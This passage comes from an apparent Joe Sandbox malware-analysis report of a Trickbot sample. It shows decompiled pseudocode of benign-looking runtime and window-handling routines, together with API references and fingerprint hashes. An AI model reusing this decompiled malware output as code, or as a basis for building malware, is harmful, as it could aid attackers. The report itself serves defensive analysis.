                          						}
                          						__eflags = _t63 & 0x00000008;
                          						if((_t63 & 0x00000008) != 0) {
                          							L23:
                          							_t65 = _t91 & 0x0000001f;
                          							__eflags = _t65;
                          							_t67 =  &(0x44cfa0[_t91 >> 5][_t65 + _t65 * 8]);
                          							 *_t67 =  *_v8;
                          							_t67[1] =  *_t73;
                          							goto L24;
                          						}
                          						_t68 = GetFileType(_t76);
                          						__eflags = _t68;
                          						if(_t68 == 0) {
                          							goto L24;
                          						}
                          						goto L23;
                          						L24:
                          						_v8 =  &(_v8[1]);
                          						_t91 = _t91 + 1;
                          						_t73 = _t73 + 1;
                          						__eflags = _t91 - _t88;
                          					} while (_t91 < _t88);
                          					goto L25;
                          				} else {
                          					_t92 = 0x44cfa4;
                          					while(1) {
                          						_t69 = E0040511B(0x480);
                          						__eflags = _t69;
                          						if(_t69 == 0) {
                          							break;
                          						}
                          						 *0x44d0a0 =  *0x44d0a0 + 0x20;
                          						__eflags =  *0x44d0a0;
                          						 *_t92 = _t69;
                          						_t13 = _t69 + 0x480; // 0x480
                          						_t84 = _t13;
                          						while(1) {
                          							__eflags = _t69 - _t84;
                          							if(_t69 >= _t84) {
                          								break;
                          							}
                          							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
                          							 *_t69 =  *_t69 | 0xffffffff;
                          							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
                          							 *((char*)(_t69 + 5)) = 0xa;
                          							_t69 = _t69 + 0x24;
                          							_t84 =  *_t92 + 0x480;
                          						}
                          						_t92 =  &(_t92[1]);
                          						__eflags =  *0x44d0a0 - _t88; // 0x20
                          						if(__eflags < 0) {
                          							continue;
                          						}
                          						goto L18;
                          					}
                          					_t88 =  *0x44d0a0; // 0x20
                          					goto L18;
                          				}
                          			}

                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 00409340
                          • GetFileType.KERNEL32(00000480), ref: 004093EB
                          • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 0040944E
                          • GetFileType.KERNEL32(00000000), ref: 0040945C
                          • SetHandleCount.KERNEL32 ref: 00409493
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: FileHandleType$CountInfoStartup
                          • String ID:
                          • API String ID: 1710529072-0
                          • Opcode ID: 0797085bee01148bc2e14a3fc896a74d53ce77f0b5d0c0a5eef106b4e791e520
                          • Instruction ID: 598ca91431e2b694c3ba0771bf903f2c3e2c039eb7f80bf9f392c62e7bcf0086
                          • Opcode Fuzzy Hash: 0797085bee01148bc2e14a3fc896a74d53ce77f0b5d0c0a5eef106b4e791e520
                          • Instruction Fuzzy Hash: B3511B315042058FD7248F28D88476B77E0FB56728F28467ED8A2E73E2D7789C06CB59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 82%
                          			E004345A6(void* __ecx, void* __edx, void* __eflags, signed int _a4) {
                          				intOrPtr _v8;
                          				char _v12;
                          				void* _v20;
                          				void* __ebp;
                          				intOrPtr* _t51;
                          				intOrPtr _t54;
                          				int _t58;
                          				signed int _t65;
                          				int _t77;
                          				void* _t79;
                          				signed int _t80;
                          				signed int _t82;
                          				signed int _t83;
                          				int _t84;
                          				void* _t88;
                          				int _t91;
                          				signed int _t100;
                          				signed int _t104;
                          				void* _t109;
                          				struct tagRECT* _t110;
                          
                          				_t88 = __ecx;
                          				_t104 = _a4 + _a4 * 4 << 3;
                          				_t109 = _t104 +  *((intOrPtr*)(__ecx + 0x90));
                          				_t51 = E00434522(__ecx, __edx, __eflags,  &_v20);
                          				_v12 =  *_t51;
                          				_v8 =  *((intOrPtr*)(_t51 + 4));
                          				_t91 =  *(_t109 + 0x24);
                          				_t100 = 0 |  *(_t109 + 0x20) - _t91 < 0x00000000;
                          				_t54 =  *((intOrPtr*)(__ecx + 0xec));
                          				if(_t54 == 0) {
                          					 *(_t109 + 0x18) =  *(_t109 + 0x20);
                          					 *(_t109 + 0x1c) =  *(_t109 + 0x24);
                          					L12:
                          					_v20 = MulDiv( *(_t109 + 0x10),  *(_t109 + 0x18),  *(_t109 + 0x1c));
                          					_t58 = MulDiv( *(_t109 + 0x14),  *(_t109 + 0x18),  *(_t109 + 0x1c));
                          					_t110 = _t104 +  *((intOrPtr*)(_t88 + 0x90));
                          					SetRect(_t110, 8, 8, _v20 + 0xb, _t58 + 0xb);
                          					if( *((intOrPtr*)(_t88 + 0xec)) != 0) {
                          						_push(0x43b688);
                          						_t65 = _t110->right - _t110->left + 0x10;
                          						__eflags = _t65;
                          						_push( &_v12);
                          						_push(_t110->bottom - _t110->top + 0x10);
                          						_push(_t65);
                          						_push(1);
                          						return E0041FDB2(_t88, _t65);
                          					}
                          					asm("cdq");
                          					asm("cdq");
                          					_t77 = OffsetRect(_t110, (_v12 - _t110->right - _t110->left - _t100 >> 1) - 1, (_v8 - _t110->bottom - _t110->top - _t100 >> 1) - 1);
                          					if(_a4 != 1) {
                          						return _t77;
                          					}
                          					return OffsetRect(_t110,  *(_t88 + 0xfc), 0);
                          				}
                          				_t79 = _t54 - 1;
                          				if(_t79 == 0) {
                          					__eflags = _t100;
                          					 *(_t109 + 0x1c) = _t91;
                          					_t80 =  *(_t109 + 0x20);
                          					if(_t100 == 0) {
                          						_t82 = _t80 + _t80 * 2 - _t91;
                          					} else {
                          						_t82 = _t80 + _t91;
                          						__eflags = _t82;
                          					}
                          					asm("cdq");
                          					_t83 = _t82 - _t100;
                          					__eflags = _t83;
                          					_t84 = _t83 >> 1;
                          					L9:
                          					 *(_t109 + 0x18) = _t84;
                          					goto L12;
                          				}
                          				if(_t79 != 1) {
                          					goto L12;
                          				}
                          				if(_t100 == 0) {
                          					 *(_t109 + 0x1c) = _t91;
                          					_t84 = ( *(_t109 + 0x20) << 1) -  *(_t109 + 0x24);
                          				} else {
                          					_t84 = 1;
                          					 *(_t109 + 0x1c) = _t84;
                          				}
                          				goto L9;
                          			}

                          APIs
                          • MulDiv.KERNEL32(?,?,?), ref: 0043463E
                          • MulDiv.KERNEL32(?,?,?), ref: 00434650
                          • SetRect.USER32(?,00000008,00000008,?,-0000000B), ref: 0043466E
                          • OffsetRect.USER32(?,?,?), ref: 004346A7
                          • OffsetRect.USER32(?,?,00000000), ref: 004346B8
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Rect$Offset
                          • String ID:
                          • API String ID: 3858320380-0
                          • Opcode ID: d7b40c23134d21506fe140c2f1d7b9203cb452ee1dcb87c8299ecca9c7e817ae
                          • Instruction ID: b37095638a5e47dc748724b199ef50741266613d0d41d163cfff4e1f0d1d9786
                          • Opcode Fuzzy Hash: d7b40c23134d21506fe140c2f1d7b9203cb452ee1dcb87c8299ecca9c7e817ae
                          • Instruction Fuzzy Hash: 7B418A71600A05AFC724CF6CC945AAABBF5FB88300F048A2EE986D7655C734F905CB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 89%
                          			E0041FDB2(void* __ecx, void* __eflags) {
                          				struct tagPOINT* _t76;
                          				long* _t78;
                          				long* _t81;
                          				struct tagPOINT* _t82;
                          				signed int _t84;
                          				signed int _t85;
                          				signed int _t86;
                          				int _t87;
                          				struct tagPOINT* _t97;
                          				signed int _t108;
                          				void* _t123;
                          				void* _t125;
                          
                          				E00405340(E00437D64, _t125);
                          				_t123 = __ecx;
                          				_push(0);
                          				 *(_t125 - 0x10) =  *(__ecx + 0x40);
                          				 *(__ecx + 0x40) =  *(_t125 + 8);
                          				 *(__ecx + 0x44) =  *(_t125 + 0xc);
                          				 *(__ecx + 0x48) =  *(_t125 + 0x10);
                          				E004215AA(_t125 - 0x24, __eflags);
                          				 *(_t125 - 4) =  *(_t125 - 4) & 0x00000000;
                          				E0042101E(_t125 - 0x24,  *(__ecx + 0x40));
                          				_t76 = __ecx + 0x4c;
                          				_t76->x =  *(__ecx + 0x44);
                          				_t76->y =  *(__ecx + 0x48);
                          				LPtoDP( *(_t125 - 0x1c), _t76, 1);
                          				_t78 =  *(_t125 + 0x14);
                          				_t97 = __ecx + 0x54;
                          				_t97->x =  *_t78;
                          				_t97->y = _t78[1];
                          				LPtoDP( *(_t125 - 0x1c), _t97, 1);
                          				_t81 =  *(_t125 + 0x18);
                          				_t82 = __ecx + 0x5c;
                          				_t82->x =  *_t81;
                          				_t82->y = _t81[1];
                          				LPtoDP( *(_t125 - 0x1c), _t82, 1);
                          				_t84 =  *(__ecx + 0x50);
                          				if(_t84 < 0) {
                          					 *(__ecx + 0x50) =  ~_t84;
                          				}
                          				_t85 =  *(_t123 + 0x58);
                          				if(_t85 < 0) {
                          					 *(_t123 + 0x58) =  ~_t85;
                          				}
                          				_t86 =  *(_t123 + 0x60);
                          				_t133 = _t86;
                          				if(_t86 < 0) {
                          					 *(_t123 + 0x60) =  ~_t86;
                          				}
                          				 *(_t125 - 4) =  *(_t125 - 4) | 0xffffffff;
                          				_t87 = E0042161C(_t125 - 0x24, _t133);
                          				_t108 = 0xa;
                          				if(_t97->x == 0) {
                          					asm("cdq");
                          					_t87 =  *(_t123 + 0x4c) / _t108;
                          					_t97->x = _t87;
                          				}
                          				if( *(_t123 + 0x58) == 0) {
                          					asm("cdq");
                          					_t87 =  *(_t123 + 0x50) / _t108;
                          					 *(_t123 + 0x58) = _t87;
                          				}
                          				if( *(_t123 + 0x5c) == 0) {
                          					asm("cdq");
                          					_t87 = _t97->x / _t108;
                          					 *(_t123 + 0x5c) = _t87;
                          				}
                          				if( *(_t123 + 0x60) == 0) {
                          					asm("cdq");
                          					_t87 =  *(_t123 + 0x58) / _t108;
                          					 *(_t123 + 0x60) = _t87;
                          				}
                          				if( *(_t123 + 0x1c) != 0) {
                          					E00420207(_t123);
                          					_t87 =  *(_t125 - 0x10);
                          					if(_t87 !=  *((intOrPtr*)(_t123 + 0x40))) {
                          						_t87 = InvalidateRect( *(_t123 + 0x1c), 0, 1);
                          					}
                          				}
                          				 *[fs:0x0] =  *((intOrPtr*)(_t125 - 0xc));
                          				return _t87;
                          			}
                          0x0041fdb7
                          0x0041fdc1
                          0x0041fdc4
                          0x0041fdcc
                          0x0041fdd2
                          0x0041fdd8
                          0x0041fdde
                          0x0041fde1
                          0x0041fde9
                          0x0041fdf0
                          0x0041fdfe
                          0x0041fe07
                          0x0041fe0c
                          0x0041fe0f
                          0x0041fe11
                          0x0041fe14
                          0x0041fe22
                          0x0041fe24
                          0x0041fe27
                          0x0041fe29
                          0x0041fe33
                          0x0041fe3a
                          0x0041fe3c
                          0x0041fe3f
                          0x0041fe41
                          0x0041fe46
                          0x0041fe4a
                          0x0041fe4a
                          0x0041fe4d
                          0x0041fe52
                          0x0041fe56
                          0x0041fe56
                          0x0041fe59
                          0x0041fe5c
                          0x0041fe5e
                          0x0041fe62
                          0x0041fe62
                          0x0041fe65
                          0x0041fe6c
                          0x0041fe76
                          0x0041fe77
                          0x0041fe7e
                          0x0041fe7f
                          0x0041fe81
                          0x0041fe81
                          0x0041fe87
                          0x0041fe8e
                          0x0041fe8f
                          0x0041fe91
                          0x0041fe91
                          0x0041fe99
                          0x0041fe9f
                          0x0041fea0
                          0x0041fea2
                          0x0041fea2
                          0x0041fea8
                          0x0041fead
                          0x0041feae
                          0x0041feb0
                          0x0041feb0
                          0x0041feb6
                          0x0041feba
                          0x0041febf
                          0x0041fec5
                          0x0041fecd
                          0x0041fecd
                          0x0041fec5
                          0x0041fed9
                          0x0041fee1

                          APIs
                          • __EH_prolog.LIBCMT ref: 0041FDB7
                            • Part of subcall function 004215AA: __EH_prolog.LIBCMT ref: 004215AF
                            • Part of subcall function 004215AA: GetWindowDC.USER32(?), ref: 004215D8
                            • Part of subcall function 0042101E: SetMapMode.GDI32(?,?), ref: 00421037
                            • Part of subcall function 0042101E: SetMapMode.GDI32(?,?), ref: 00421045
                          • LPtoDP.GDI32(?,?,00000001), ref: 0041FE0F
                          • LPtoDP.GDI32(?,?,00000001), ref: 0041FE27
                          • LPtoDP.GDI32(?,?,00000001), ref: 0041FE3F
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0041FECD
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: H_prologMode$InvalidateRectWindow
                          • String ID:
                          • API String ID: 2422810626-0
                          • Opcode ID: 6c6b6390418f33674b7f9665b9d906266f332e391b03e1505dbdd6c9eeeeb077
                          • Instruction ID: 8c75bdfb8851e5d1ca44770e13910a47d00e78528ca0003b85b34d38e4a0621c
                          • Opcode Fuzzy Hash: 6c6b6390418f33674b7f9665b9d906266f332e391b03e1505dbdd6c9eeeeb077
                          • Instruction Fuzzy Hash: 31410270A00B19DFCB24DF6AC480A9AB7F5BF58308F10486EE58697B61D7B5E845CB14
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 91%
                          			E00426985(intOrPtr* __ecx, intOrPtr _a4) {
                          				struct tagPOINT _v12;
                          				short _t29;
                          				signed int _t30;
                          				intOrPtr _t31;
                          				int _t32;
                          				int _t36;
                          				long _t37;
                          				signed int _t48;
                          				void* _t52;
                          				void* _t53;
                          				void* _t54;
                          				intOrPtr _t55;
                          				void* _t56;
                          				void* _t57;
                          				signed int _t60;
                          				intOrPtr* _t63;
                          
                          				_push(__ecx);
                          				_push(__ecx);
                          				_t63 = __ecx;
                          				GetCursorPos( &_v12);
                          				_t29 = GetKeyState(0x11);
                          				_t30 = 0;
                          				_t60 = ((0 | _t29 >= 0x00000000) - 0x00000001 & 0xfffffff1) + 0x10;
                          				_t52 = _a4 - 0xd;
                          				if(_t52 == 0) {
                          					_t31 =  *_t63;
                          					_push(1);
                          					goto L28;
                          				} else {
                          					_t53 = _t52 - 0xe;
                          					if(_t53 == 0) {
                          						_t31 =  *_t63;
                          						_push(0);
                          						L28:
                          						_t32 =  *((intOrPtr*)(_t31 + 0x11c))();
                          					} else {
                          						_t54 = _t53 - 0xa;
                          						if(_t54 == 0) {
                          							_t48 = 0xffffffff;
                          							goto L11;
                          						} else {
                          							_t56 = _t54 - 1;
                          							if(_t56 == 0) {
                          								_t30 = 0xffffffff;
                          								goto L11;
                          							} else {
                          								_t57 = _t56 - 1;
                          								if(_t57 == 0) {
                          									_t48 = 1;
                          									goto L11;
                          								} else {
                          									if(_t57 == 1) {
                          										_t30 = 1;
                          										L11:
                          										_t55 =  *((intOrPtr*)(_t63 + 0xc0));
                          										if(_t55 == 1 || _t55 >= 0x65 && _t55 <= 0x73) {
                          											_t48 = 0;
                          										}
                          										if(_t55 == 2 || _t55 >= 0xc9 && _t55 <= 0xd7) {
                          											_t30 = 0;
                          										}
                          										_v12.y = _v12.y + _t30 * _t60;
                          										_v12.x = _v12.x + _t48 * _t60;
                          										ScreenToClient( *(_t63 + 0x1c),  &_v12);
                          										_t36 =  *((intOrPtr*)(_t63 + 0x94));
                          										if(_v12.y < _t36) {
                          											L21:
                          											_v12.y = _t36;
                          										} else {
                          											_t36 =  *((intOrPtr*)(_t63 + 0x9c));
                          											if(_v12.y > _t36) {
                          												goto L21;
                          											}
                          										}
                          										_t37 =  *(_t63 + 0x90);
                          										if(_v12.x < _t37) {
                          											L24:
                          											_v12.x = _t37;
                          										} else {
                          											_t37 =  *(_t63 + 0x98);
                          											if(_v12.x > _t37) {
                          												goto L24;
                          											}
                          										}
                          										ClientToScreen( *(_t63 + 0x1c),  &_v12);
                          										_t32 = SetCursorPos(_v12, _v12.y);
                          									} else {
                          										_t32 = E004187B4(_t63);
                          									}
                          								}
                          							}
                          						}
                          					}
                          				}
                          				return _t32;
                          			}
                          0x00426988
                          0x00426989
                          0x0042698f
                          0x00426992
                          0x0042699a
                          0x004269ac
                          0x004269b4
                          0x004269b8
                          0x004269bb
                          0x00426a90
                          0x00426a92
                          0x00000000
                          0x004269c1
                          0x004269c1
                          0x004269c4
                          0x00426a8a
                          0x00426a8c
                          0x00426a94
                          0x00426a96
                          0x004269ca
                          0x004269ca
                          0x004269cd
                          0x004269f3
                          0x00000000
                          0x004269cf
                          0x004269cf
                          0x004269d0
                          0x004269ee
                          0x00000000
                          0x004269d2
                          0x004269d2
                          0x004269d3
                          0x004269eb
                          0x00000000
                          0x004269d5
                          0x004269d6
                          0x004269e6
                          0x004269f6
                          0x004269f6
                          0x004269ff
                          0x00426a0b
                          0x00426a0b
                          0x00426a10
                          0x00426a22
                          0x00426a22
                          0x00426a2a
                          0x00426a2d
                          0x00426a37
                          0x00426a3d
                          0x00426a46
                          0x00426a53
                          0x00426a53
                          0x00426a48
                          0x00426a48
                          0x00426a51
                          0x00000000
                          0x00000000
                          0x00426a51
                          0x00426a56
                          0x00426a5f
                          0x00426a6c
                          0x00426a6c
                          0x00426a61
                          0x00426a61
                          0x00426a6a
                          0x00000000
                          0x00000000
                          0x00426a6a
                          0x00426a76
                          0x00426a82
                          0x004269d8
                          0x004269da
                          0x004269da
                          0x004269d6
                          0x004269d3
                          0x004269d0
                          0x004269cd
                          0x004269c4
                          0x00426a9f

                          APIs
                          • GetCursorPos.USER32(?), ref: 00426992
                          • GetKeyState.USER32(00000011), ref: 0042699A
                          • ScreenToClient.USER32(?,?), ref: 00426A37
                          • ClientToScreen.USER32(?,?), ref: 00426A76
                          • SetCursorPos.USER32(?,?), ref: 00426A82
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: ClientCursorScreen$State
                          • String ID:
                          • API String ID: 3982492586-0
                          • Opcode ID: f1df2e6c66b737ac4e508868f90e8d2a9009531a7fc04688ba6ab731cb3bb3c3
                          • Instruction ID: 9f0fe253b9640e6fb30dd2b8f13d62a3ee5c7078030d50b97a68578ead713894
                          • Opcode Fuzzy Hash: f1df2e6c66b737ac4e508868f90e8d2a9009531a7fc04688ba6ab731cb3bb3c3
                          • Instruction Fuzzy Hash: 5D31D871B00515DFCB288F68E945AAE7BB6EB41310FA5C12FE103E66D4DA795D81C708
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 83%
                          			E00425D3C(struct HDWP__** _a4, intOrPtr* _a8, long _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                          				struct tagRECT _v20;
                          				struct tagRECT _v36;
                          				void* __ebp;
                          				long _t27;
                          				int _t39;
                          				intOrPtr* _t52;
                          				intOrPtr _t53;
                          				void* _t63;
                          				intOrPtr _t67;
                          				intOrPtr _t68;
                          				void* _t70;
                          				void* _t76;
                          
                          				_t52 = _a8;
                          				_t63 = 0;
                          				_t68 = _a24;
                          				_t67 = _a20;
                          				if(_a28 != 0) {
                          					_push(1);
                          					_pop(0);
                          					if(_t67 > 0 && _t68 > 0) {
                          					}
                          					asm("sbb edx, edx");
                          					asm("sbb eax, eax");
                          					E0041B6A3(_t52, 0x1000000, 0x800000, _t63);
                          					_t63 = 0;
                          				}
                          				_t27 = _a12;
                          				_t53 = _a16;
                          				_v20.left = _t27;
                          				_v20.top = _t53;
                          				_t76 =  *0x44b354 - _t63; // 0x1
                          				_v20.right = _t27 + _t67;
                          				_v20.bottom = _t53 + _t68;
                          				if(_t76 == 0) {
                          					if(_a28 == _t63) {
                          						 *((intOrPtr*)( *_t52 + 0x60))( &_v20, _t63);
                          					} else {
                          						InflateRect( &_v20, 1, 1);
                          					}
                          				}
                          				if((E0041B689(_t52) & 0x00000002) != 0 || E0041C5C7(_t52, 0x43b880) != 0) {
                          					InflateRect( &_v20,  *0x44b308,  *0x44b30c);
                          				}
                          				GetWindowRect( *(_t52 + 0x1c),  &_v36);
                          				E0042147E(E0041884D(_t70, GetParent( *(_t52 + 0x1c))),  &_v36);
                          				_t39 = EqualRect( &_v20,  &_v36);
                          				if(_t39 != 0) {
                          					return _t39;
                          				} else {
                          					return E0041A3D0(_a4,  *(_t52 + 0x1c),  &_v20);
                          				}
                          			}
                          0x00425d43
                          0x00425d46
                          0x00425d4c
                          0x00425d50
                          0x00425d53
                          0x00425d55
                          0x00425d57
                          0x00425d5a
                          0x00425d5a
                          0x00425d67
                          0x00425d72
                          0x00425d7f
                          0x00425d84
                          0x00425d84
                          0x00425d86
                          0x00425d89
                          0x00425d8c
                          0x00425d8f
                          0x00425d96
                          0x00425da2
                          0x00425da5
                          0x00425da8
                          0x00425dad
                          0x00425dc4
                          0x00425daf
                          0x00425db7
                          0x00425db7
                          0x00425dad
                          0x00425dd1
                          0x00425df3
                          0x00425df3
                          0x00425dfc
                          0x00425e17
                          0x00425e24
                          0x00425e2c
                          0x00425e41
                          0x00425e2e
                          0x00000000
                          0x00425e38

                          APIs
                          • InflateRect.USER32(?,00000001,00000001), ref: 00425DB7
                          • InflateRect.USER32(?), ref: 00425DF3
                          • GetWindowRect.USER32(?,?), ref: 00425DFC
                          • GetParent.USER32(?), ref: 00425E05
                          • EqualRect.USER32(?,?), ref: 00425E24
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Rect$Inflate$EqualParentWindow
                          • String ID:
                          • API String ID: 596032063-0
                          • Opcode ID: 97d91a57028c182f0ba147137f26a49a1dd616e8e2810dd6ad460fb37f09a6c1
                          • Instruction ID: fd402f18dda591d2256a94b4b3bc6b3b601ca0d566fefe5c636549cf34400164
                          • Opcode Fuzzy Hash: 97d91a57028c182f0ba147137f26a49a1dd616e8e2810dd6ad460fb37f09a6c1
                          • Instruction Fuzzy Hash: B4317E72A00629ABCF04DFA5EC45AFE77A9EF88300F44843EF901E7251DB38D8458B58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 82%
                          			E00424D26(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, RECT* _a12) {
                          				struct tagRECT _v20;
                          				intOrPtr _t18;
                          				intOrPtr _t33;
                          
                          				_t43 = _a4;
                          				if(_a4 != 0) {
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					_t18 = _a8;
                          					__eflags = _t18;
                          					if(_t18 == 0) {
                          						__eflags =  *0x44b354; // 0x1
                          						if(__eflags == 0) {
                          							L9:
                          							E0042CB2D( &_v20,  *0x44b328,  *0x44b324);
                          							InflateRect( &_v20, 0xffffffff, 0xffffffff);
                          							L10:
                          							_push( *0x44b320);
                          							return E0042CAB7(_t43,  &_v20);
                          						}
                          						E0042CB2D( &_v20,  *0x44b320,  *0x44b330);
                          						InflateRect( &_v20, 0xffffffff, 0xffffffff);
                          						E0042CB2D( &_v20,  *0x44b328,  *0x44b324);
                          						InflateRect( &_v20, 0xffffffff, 0xffffffff);
                          						goto L10;
                          					}
                          					_t33 = _t18 - 1;
                          					__eflags = _t33;
                          					if(_t33 == 0) {
                          						__eflags =  *0x44b354; // 0x1
                          						if(__eflags != 0) {
                          							goto L10;
                          						}
                          						goto L9;
                          					}
                          					__eflags = _t33 != 0;
                          					if(_t33 != 0) {
                          						goto L10;
                          					}
                          					E0042CB2D( &_v20,  *0x44b324,  *0x44b328);
                          					InflateRect( &_v20, 0xffffffff, 0xffffffff);
                          					return E0042CB2D( &_v20,  *0x44b330,  *0x44b320);
                          				}
                          				return RedrawWindow( *(__ecx + 0x1c), _a12, 0, 0x41);
                          			}
                          0x00424d2d
                          0x00424d35
                          0x00424d55
                          0x00424d56
                          0x00424d57
                          0x00424d58
                          0x00424d59
                          0x00424d59
                          0x00424d5c
                          0x00424dae
                          0x00424db4
                          0x00424e08
                          0x00424e1a
                          0x00424e27
                          0x00424e2d
                          0x00424e2d
                          0x00000000
                          0x00424e39
                          0x00424dc8
                          0x00424ddb
                          0x00424def
                          0x00424dfc
                          0x00000000
                          0x00424dfc
                          0x00424d5e
                          0x00424d5e
                          0x00424d5f
                          0x00424e00
                          0x00424e06
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00424e06
                          0x00424d66
                          0x00424d67
                          0x00000000
                          0x00000000
                          0x00424d7f
                          0x00424d8c
                          0x00000000
                          0x00424da4
                          0x00000000

                          APIs
                          • RedrawWindow.USER32(00000041,?,00000000,00000041), ref: 00424D40
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00424D8C
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: InflateRectRedrawWindow
                          • String ID:
                          • API String ID: 3190756164-0
                          • Opcode ID: 328025632785f1a38ed19f569bb753ad3dc359ba1c4c34850189f68c1b46e62e
                          • Instruction ID: 24787cd3d30c62034af445ddf4f71539a3e1e5f70854aa87256fd70180343953
                          • Opcode Fuzzy Hash: 328025632785f1a38ed19f569bb753ad3dc359ba1c4c34850189f68c1b46e62e
                          • Instruction Fuzzy Hash: A8315075A0022EABDF05DFA5AC45CBEB769FB49324794063AF930A31E0DB35D805CB58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 95%
                          			E0041AEEF(void* __ebx, intOrPtr __ecx, void* __eflags) {
                          				void* _t31;
                          				signed int _t42;
                          				struct HWND__* _t62;
                          				void* _t64;
                          
                          				E00405340(E00437864, _t64);
                          				 *((intOrPtr*)(_t64 - 0x10)) = __ecx;
                          				E0041BBAB(_t64 - 0x38);
                          				E0041842C(_t64 - 0x74);
                          				 *(_t64 - 4) = 0;
                          				_t62 = GetTopWindow( *(__ecx + 0x1c));
                          				if(_t62 != 0) {
                          					do {
                          						 *(_t64 - 0x58) = _t62;
                          						 *(_t64 - 0x34) = GetDlgCtrlID(_t62) & 0x0000ffff;
                          						_push(_t62);
                          						 *((intOrPtr*)(_t64 - 0x24)) = _t64 - 0x74;
                          						if(E00418874() == 0 || E0041BA05(_t35, 0, 0xbd11ffff, _t64 - 0x38, 0) == 0) {
                          							if(E0041BA05( *((intOrPtr*)(_t64 - 0x10)),  *(_t64 - 0x34), 0xffffffff, _t64 - 0x38, 0) == 0) {
                          								_t46 =  *((intOrPtr*)(_t64 + 0xc));
                          								if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
                          									if((SendMessageA( *(_t64 - 0x58), 0x87, 0, 0) & 0x00000020) == 0) {
                          										L11:
                          										_t46 = 0;
                          									} else {
                          										_t42 = E0041B66F(_t64 - 0x74) & 0x0000000f;
                          										if(_t42 == 3 || _t42 == 6 || _t42 == 7 || _t42 == 9) {
                          											goto L11;
                          										}
                          									}
                          								}
                          								E0041BD70(_t64 - 0x38,  *((intOrPtr*)(_t64 + 8)), _t46);
                          							}
                          						}
                          						_t62 = GetWindow(_t62, 2);
                          					} while (_t62 != 0);
                          				}
                          				 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
                          				 *(_t64 - 0x58) = 0;
                          				_t31 = E00418EC0(_t64 - 0x74);
